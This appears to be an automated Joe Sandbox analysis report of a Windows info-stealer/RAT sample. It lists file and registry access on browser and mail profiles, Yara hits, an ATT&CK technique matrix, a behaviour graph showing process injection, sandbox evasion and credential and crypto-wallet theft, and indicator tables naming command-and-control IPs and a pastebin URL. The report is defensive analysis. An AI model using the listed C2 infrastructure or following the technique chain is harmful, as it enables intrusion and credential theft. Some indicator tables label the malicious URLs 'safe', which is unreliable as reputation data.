                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browserJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entriesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeDirectory queried: number of queries: 1001
                      Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 7724, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 10.2.V3.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5152b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fcb57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.510da8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec65ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.V3.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fd757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.52e1a8a.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53b7a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5327757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec59ce.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5326b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5153757.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2e80901.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1322328519.0000000000DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1720436187.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.1326989708.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1297243134.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1440280085.000001F666614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1740003326.000001F666761000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1394467847.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1326750391.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe, type: DROPPED
                      Source: Yara matchFile source: 32.2.cmd.exe.31c00c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.59800c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.59800c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.MSBuild.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.31c00c8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3766821762.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7596, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tqco, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cfi, type: DROPPED
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218D4088 socket,bind,17_3_00007DF4218D4088
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218A1B18 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,17_3_00007DF4218A1B18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230766FCDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,26_2_00000230766FCDF4
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      11
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      Boot or Logon Initialization Scripts11
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      13
                      File and Directory Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
                      Process Injection
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Credentials in Registry
                      149
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
                      Obfuscated Files or Information
                      NTDS351
                      Security Software Discovery
                      Distributed Component Object Model21
                      Input Capture
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Software Packing
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeylogging2
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      DLL Side-Loading
                      Cached Domain Credentials2
                      Process Discovery
                      VNCGUI Input Capture13
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499938 Sample: file.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 70 pastebin.com 2->70 72 time.windows.com 2->72 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 96 12 other signatures 2->96 12 file.exe 8 2->12         started        15 SendBugReportNew.exe 2->15         started        18 SendBugReportNew.exe 1 2->18         started        signatures3 94 Connects to a pastebin service (likely for C&C) 70->94 process4 file5 60 C:\Users\user\AppData\Local\...\vclx120.bpl, PE32 12->60 dropped 62 C:\Users\user\AppData\Local\Temp\vcl120.bpl, PE32 12->62 dropped 64 C:\Users\user\AppData\Local\Temp\rtl120.bpl, PE32 12->64 dropped 66 C:\Users\user\...\SendBugReportNew.exe, PE32 12->66 dropped 20 SendBugReportNew.exe 4 12->20         started        124 Maps a DLL or memory area into another process 15->124 126 Found direct / indirect Syscall (likely to bypass EDR) 15->126 24 cmd.exe 15->24         started        26 cmd.exe 18->26         started        signatures6 process7 file8 56 C:\Users\user\AppData\Roaming\...\V3.exe, PE32 20->56 dropped 102 Maps a DLL or memory area into another process 20->102 104 Switches to a custom stack to bypass stack traces 20->104 28 V3.exe 1 20->28         started        31 cmd.exe 4 20->31         started        58 C:\Users\user\AppData\Local\Temp\tqco, PE32 24->58 dropped 106 Writes to foreign memory regions 24->106 34 conhost.exe 24->34         started        36 MSBuild.exe 24->36         started        38 conhost.exe 26->38         started        signatures9 process10 file11 114 Machine Learning detection for dropped file 28->114 116 Switches to a custom stack to bypass stack traces 28->116 40 OpenWith.exe 28->40         started        68 C:\Users\user\AppData\Local\Temp\cfi, PE32 31->68 dropped 118 Writes to foreign memory regions 31->118 120 Found hidden mapped module (file has been removed from disk) 31->120 122 Maps a DLL or memory area into another process 31->122 44 MSBuild.exe 15 2 31->44         started        46 conhost.exe 31->46         started        signatures12 process13 dnsIp14 74 154.216.19.149, 2047, 443, 49706 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 40->74 108 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 40->108 110 Switches to a custom stack to bypass stack traces 40->110 48 OpenWith.exe 40->48         started        76 85.209.133.150, 49726, 6677 CMCSUS Germany 44->76 78 pastebin.com 104.20.4.235, 443, 49725 CLOUDFLARENETUS United States 44->78 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 44->112 signatures15 process16 signatures17 80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 48->80 82 Tries to steal Mail credentials (via file / registry access) 48->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 48->84 86 2 other signatures 48->86 51 wmplayer.exe 48->51         started        process18 signatures19 98 Writes to foreign memory regions 51->98 100 Allocates memory in foreign processes 51->100 54 dllhost.exe 51->54         started        process20

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe3%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\cfi100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Local\Temp\tqco100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Local\Temp\cfi100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\tqco100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\rtl120.bpl0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\vcl120.bpl0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\vclx120.bpl0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://www.digicert.c0%Avira URL Cloudsafe
                      https://www.iobit.com/en/privacy.phpOpenU0%Avira URL Cloudsafe
                      http://www.vmware.com/0/0%Avira URL Cloudsafe
                      https://support.office.com/article/7D48285B-20E8-4B9B-910%Avira URL Cloudsafe
                      https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud(0%Avira URL Cloudsafe
                      http://www.vmware.com/00%Avira URL Cloudsafe
                      http://www.symauth.com/cps0(0%URL Reputationsafe
                      https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifudkernelbasentdllkernel32GetProcessMitigationP0%Avira URL Cloudsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.symauth.com/rpa000%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      http://c0rl.m%L0%Avira URL Cloudsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.sea0%Avira URL Cloudsafe
                      https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud0%Avira URL Cloudsafe
                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201691ad-2160%Avira URL Cloudsafe
                      https://pastebin.com/raw/jxfGm9Pc0%Avira URL Cloudsafe
                      http://www.info-zip.org/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      pastebin.com
                      104.20.4.235
                      truetrue
                        unknown
                        time.windows.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifudtrue
                          • Avira URL Cloud: safe
                          unknown
                          https://pastebin.com/raw/jxfGm9Pctrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://sectigo.com/CPS0file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.digicert.cSendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.vmware.com/0SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.sectigo.com0file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91OpenWith.exe, 00000011.00000003.1505283509.000001F6663DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/envelope/file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000000.1290343124.0000000000401000.00000020.00000001.01000000.00000005.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.iobit.com/en/privacy.phpOpenUfile.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000000.1290343124.0000000000401000.00000020.00000001.01000000.00000005.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.vmware.com/0/SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud(OpenWith.exe, 0000000D.00000002.1394086131.00000000026EC000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016OpenWith.exe, 00000011.00000003.1504313864.000001F6663DE000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502338268.000001F66667B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifudkernelbasentdllkernel32GetProcessMitigationPOpenWith.exe, 0000000D.00000003.1393605091.0000000004F54000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1393605091.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000002.1394825096.0000000004F59000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.ecosia.org/newtab/OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://c0rl.m%LSendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.symauth.com/cps0(SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.seaOpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ac.ecosia.org/autocomplete?q=OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tfile.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.symauth.com/rpa00SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201691ad-216OpenWith.exe, 00000011.00000003.1504313864.000001F6663DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchOpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.info-zip.org/SendBugReportNew.exe, 00000009.00000002.1404272161.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686907778.00000000050BE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OpenWith.exe, 00000011.00000003.1545991978.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501094672.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1556366377.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1507797611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1501856862.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1539955152.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1551283365.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1495610611.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1544923206.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1557954411.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1541801059.000001F666877000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1502193124.000001F666877000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          154.216.19.149
                          unknownSeychelles
                          135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                          104.20.4.235
                          pastebin.comUnited States
                          13335CLOUDFLARENETUStrue
                          85.209.133.150
                          unknownGermany
                          33657CMCSUStrue
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1499938
                          Start date and time:2024-08-27 18:22:34 +02:00
